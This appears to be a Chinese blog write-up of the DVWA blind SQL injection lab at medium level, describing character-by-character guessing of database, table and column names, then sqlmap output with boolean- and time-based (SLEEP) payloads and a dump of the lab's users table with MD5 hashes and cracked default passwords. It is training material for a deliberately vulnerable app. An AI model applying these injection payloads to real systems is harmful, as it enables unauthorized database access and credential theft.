您的位置: 首页  >  文章  >  DVWA_SQL_Injection_Blind_medium

DVWA_SQL_Injection_Blind_medium

分类: 文章 2022-10-03 22:21:21

1.判断注入点

通过and 1=1判断注入点是否存在

DVWA_SQL_Injection_Blind_medium

 

2.猜解数据库名长度

DVWA_SQL_Injection_Blind_medium

DVWA_SQL_Injection_Blind_medium

 

3.猜解数据库名

通过ASCII对照表第一个字符为d

DVWA_SQL_Injection_Blind_medium

第二个字符为v

DVWA_SQL_Injection_Blind_medium

第三个字符为w

DVWA_SQL_Injection_Blind_medium

第四个字符为a

DVWA_SQL_Injection_Blind_medium

 

数据库名为dvwa

 

4.猜解数据库中表的数量

可以看出数据库中有两个表

DVWA_SQL_Injection_Blind_medium

 

5.猜解第一张表的长度

第一张表名长度为9

DVWA_SQL_Injection_Blind_medium

6.猜解第一张表的表名

第一个字符为g

DVWA_SQL_Injection_Blind_medium

 

第二个字符为u

DVWA_SQL_Injection_Blind_medium

 

一次猜解出第一张表的数据库名为guestbook

7.猜解第二章表的长度

通过猜解,获得表名长度为5

DVWA_SQL_Injection_Blind_medium

 

8.猜解第二章表的表名

第一个字符u

DVWA_SQL_Injection_Blind_medium

第二个字符s

DVWA_SQL_Injection_Blind_medium

依次进行猜解得出表名为:users

 

9.猜解users表的字段数量

通过猜解可以获得字段数为8

DVWA_SQL_Injection_Blind_medium

 

10.猜解第users表的字段名

①第一个字段名

第一个字符为u

DVWA_SQL_Injection_Blind_medium

 

第二个字符为s

DVWA_SQL_Injection_Blind_medium

 

第三个字符为e

DVWA_SQL_Injection_Blind_medium

 

 

第四个字符为r

DVWA_SQL_Injection_Blind_medium

 

第五个字符为 _

DVWA_SQL_Injection_Blind_medium

 

第六个字符为i

DVWA_SQL_Injection_Blind_medium

 

 

 

第七个字符为d

DVWA_SQL_Injection_Blind_medium

第八个字符不存在,追钟第一个字段名为user_id

DVWA_SQL_Injection_Blind_medium

②第二个字段名

第一个字符为f

DVWA_SQL_Injection_Blind_medium

 

第二个字符i

DVWA_SQL_Injection_Blind_medium

 

第三个字符r

DVWA_SQL_Injection_Blind_medium

 

第四个字符s

DVWA_SQL_Injection_Blind_medium

 

第五个字符t

DVWA_SQL_Injection_Blind_medium

 

第六个字符_

DVWA_SQL_Injection_Blind_medium

 

 

 

第七个字符n

DVWA_SQL_Injection_Blind_medium

 

第八个字符a

DVWA_SQL_Injection_Blind_medium

 

第九个字符m

DVWA_SQL_Injection_Blind_medium

第十个字符e

DVWA_SQL_Injection_Blind_medium

 

第十一给字符不存在,最终第二个字段名为first_name

DVWA_SQL_Injection_Blind_medium

③第三个字段

第一个字符为l

DVWA_SQL_Injection_Blind_medium

 

第二个字符为a

DVWA_SQL_Injection_Blind_medium

 

重复上述操作最终可以得出8个列名分别为:

User、avatar、failed_login、first_name、last_login、last_name、password、user_id

 

11.通过sqlmap注入获得user字段和password字段的值

sqlmap identified the following injection point(s) with a total of 98 HTTP(s) requests:

---

Parameter: id (POST)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1 AND 3304=3304&Submit=Submit

 

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)&Submit=Submit

---

web application technology: Apache

back-end DBMS: MySQL >= 5.0.12

banner: '5.5.62-log'

database management system users [1]:

[*] 'dvwa'@'127.0.0.1'

 

available databases [3]:

[*] dvwa

[*] information_schema

[*] test

 

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (POST)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1 AND 3304=3304&Submit=Submit

 

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)&Submit=Submit

---

web application technology: Apache

back-end DBMS: MySQL >= 5.0.12

Database: dvwa

[2 tables]

+-----------+

| guestbook |

| users     |

+-----------+

 

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (POST)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1 AND 3304=3304&Submit=Submit

 

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)&Submit=Submit

---

web application technology: Apache

back-end DBMS: MySQL >= 5.0.12

Database: dvwa

Table: users

[8 columns]

+--------------+-------------+

| Column       | Type        |

+--------------+-------------+

| user         | varchar(15) |

| avatar       | varchar(70) |

| failed_login | int(3)      |

| first_name   | varchar(15) |

| last_login   | timestamp   |

| last_name    | varchar(15) |

| password     | varchar(32) |

| user_id      | int(6)      |

+--------------+-------------+

 

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: id (POST)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=1 AND 3304=3304&Submit=Submit

 

    Type: time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

    Payload: id=1 AND (SELECT 7200 FROM (SELECT(SLEEP(5)))BAuH)&Submit=Submit

---

web application technology: Apache

back-end DBMS: MySQL >= 5.0.12

Database: dvwa

Table: users

[5 entries]

+---------+---------------------------------------------+

| user    | password                                    |

+---------+---------------------------------------------+

| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |

| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |

| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |

| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |

+---------+---------------------------------------------+

 

 

Limit:

Limit子句是用来限制select查找结果的显示行数

 

Limit x,y

x:x代表起始位置,从0开始

y:y代表返回行数

 

substr(str,pos,len)

str:需要被截取的字符串

pos:从第几个截取,起始值为1

len:每次截取字符的长度

相关推荐